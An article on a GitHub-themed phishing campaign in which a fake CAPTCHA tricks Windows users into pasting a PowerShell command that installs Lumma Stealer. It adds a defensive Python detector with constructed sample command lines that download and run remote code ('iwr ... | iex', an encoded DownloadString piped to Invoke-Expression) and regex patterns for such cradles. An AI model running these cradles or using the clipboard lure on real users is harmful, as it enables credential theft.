Windows PowerShell Phish Has Scary Potential
A phishing campaign targeting GitHub users employs deceptive emails about security vulnerabilities, using a CAPTCHA to execute Lumma Stealer malware via Windows PowerShell, posing risks to less experienced users.
A recent phishing campaign targeting GitHub users has raised concerns because of how it uses Windows PowerShell to deliver malware. The emails appear to come from GitHub's security team, warn recipients about a vulnerability in one of their repositories and direct them to a malicious link. The page behind the link shows a fake CAPTCHA that asks the visitor to prove they are human by pressing a specific key sequence: open the Windows "Run" dialog, paste, and press Enter. The page has already placed a PowerShell command on the clipboard, so following the instructions runs that command, which downloads and executes the password-stealing malware Lumma Stealer. Experienced programmers are likely to recognize the scam, but less tech-savvy users may follow the instructions without question. The article warns that this method could evolve further and suggests that Microsoft consider restricting PowerShell for ordinary users to reduce the risk; Microsoft, however, advises against disabling PowerShell because Windows itself depends on it. The article concludes by stressing the need for awareness of such phishing attempts among less experienced Windows users.
- A phishing campaign is targeting GitHub users with emails about security vulnerabilities.
- The scam uses a fake CAPTCHA that tricks users into executing malware via Windows PowerShell.
- The malware, Lumma Stealer, is designed to steal stored credentials from victims' PCs.
- Experienced users are less likely to fall for the scam, but less tech-savvy individuals are at risk.
- There are calls for Microsoft to consider restricting PowerShell access for average users to enhance security.
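The flow described above leaves a distinctive trace in process-creation telemetry: PowerShell spawned by explorer.exe (the parent a Run-dialog launch gets), started with switches that hide the window or neutralise the execution policy, and carrying a download-and-execute cradle, sometimes wrapped in `-EncodedCommand`. As an added example, not code from the article or from any vendor product, the Python below runs that detection logic over a few constructed event records. The field names only mimic Sysmon Event ID 1 / Windows 4688 fields, the `example.invalid` URLs and every function name are assumptions made for illustration. One caveat a practitioner should keep in mind: PowerShell's execution policy governs only script files, so a command passed via `-Command` or `-EncodedCommand` runs regardless of it, and `-ExecutionPolicy Bypass` overrides the policy for that one invocation unless Group Policy enforces it, which is why the detector decodes the base64 payload rather than trusting the policy to have blocked it.

```python
"""Spot ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not code from the article: the events below are constructed
and only mimic Sysmon Event ID 1 / Windows 4688 field names.
"""
import base64
import binascii
import re
from typing import Optional

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand
ENCODED_FLAG = re.compile(r"^[-/](e|ec|en|enc|encoded|encodedcommand)$", re.I)
# download-and-run cradles that the clipboard one-liner almost always contains
CRADLE = re.compile(
    r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer|curl|wget)\b",
    re.I,
)
# switches that hide the window or neutralise profile / execution-policy checks
CONCEAL = re.compile(
    r"-(w(indowstyle)?\s+hidden|nop(rofile)?|noni(nteractive)?|"
    r"e(p|xec|xecutionpolicy)\s+bypass)\b",
    re.I,
)


def encode_command(ps_source: str) -> str:
    """Base64 of UTF-16LE text, the form powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(ps_source.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent or undecodable."""
    tokens = re.findall(r'"[^"]*"|\S+', command_line)
    for flag, value in zip(tokens, tokens[1:]):
        if ENCODED_FLAG.match(flag):
            try:
                return base64.b64decode(value.strip('"'), validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze(event: dict) -> dict:
    """Score one event: 'suspicious' needs PowerShell, a cradle and at least one more signal."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    command_line = event["CommandLine"]
    decoded = decode_encoded_command(command_line)
    # match indicators against the decoded payload too, not only the visible switches
    effective = command_line + (" " + decoded if decoded else "")

    indicators = []
    if image in POWERSHELL_IMAGES and parent == "explorer.exe":
        indicators.append("parent explorer.exe (Run dialog / desktop launch)")
    if decoded is not None:
        indicators.append("encoded command")
    indicators += ["switch " + m.group(0).lower() for m in CONCEAL.finditer(effective)]
    cradles = sorted({m.group(0).lower() for m in CRADLE.finditer(effective)})

    suspicious = image in POWERSHELL_IMAGES and bool(cradles) and bool(indicators)
    return {"suspicious": suspicious, "cradles": cradles, "indicators": indicators, "decoded": decoded}


def scan(events: list) -> list:
    """Indices of events that look like a ClickFix launch."""
    return [i for i, e in enumerate(events) if analyze(e)["suspicious"]]


# Constructed sample telemetry (not captured from a real host)
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ClickFix shape: Run dialog -> hidden PowerShell -> web cradle piped to iex
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a -UseBasicParsing | iex"'},
    # same idea hidden behind -EncodedCommand plus an execution-policy bypass
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": "powershell -nop -ep bypass -enc " + encode_command(
         "(New-Object Net.WebClient).DownloadString('http://example.invalid/b') | Invoke-Expression")},
    # benign: an admin runs a local script from the Run dialog
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
    # benign: unrelated child of cmd.exe
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami /all"},
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(i, analyze(SAMPLE_EVENTS[i]))
```

The benign `-File` launch from the Run dialog is deliberately left unflagged: the parent process alone is a weak signal, and the rule only fires once a web cradle is present in either the visible command line or the decoded payload.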
Related
A Hacker 'Ghost' Network Is Quietly Spreading Malware on GitHub
Cybersecurity researchers discovered a network of 3,000 fake GitHub accounts, "Stargazer Goblin," spreading malware like ransomware. The operation manipulates GitHub tools, targeting Windows users seeking free software.
Hackers bypass Windows SmartScreen flaw to launch malware
Cybercriminals are exploiting a Microsoft Defender SmartScreen bypass (CVE-2024-21412) to install malware undetected. Many systems remain unpatched and therefore exposed. Users should update Windows and be cautious with email attachments.
A Hacker 'Ghost' Network Is Quietly Spreading Malware on GitHub
Cybersecurity researchers discovered a network of 3,000 fake GitHub accounts, "Stargazer Goblin," spreading malware like ransomware. The network manipulates GitHub's tools to promote malicious repositories targeting Windows users.
Nefarious actors attack from 3k shadow GitHub accounts, spreading malware
A cybercriminal network, Stargazer Goblin, uses 3,000 ghost accounts on GitHub to spread malware disguised as legitimate software, generating up to $100,000 while evading detection amid GitHub's vast user base.
GitHub Notification Emails Hijacked to Send Malware
A security incident reveals that GitHub notification emails can be hijacked to distribute malware, specifically "LUMMASTEALER," which targets sensitive information. Recommendations include improving email clarity and security measures.
Chrome at least requires a prompt for reading clipboard contents, which is apparently "diverting from the specifications"!
Who came up with this? Why is every feature in web browsers and javascript built in the dumbest way possible? At least in Win32 when it says "you should only touch the clipboard on request from the user" they have the excuse that it was 1995 and there was very little information to muck with or steal on the average computer! Even then they still worked towards hardening the functionality.
Web browsers implemented this in 2018!
So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?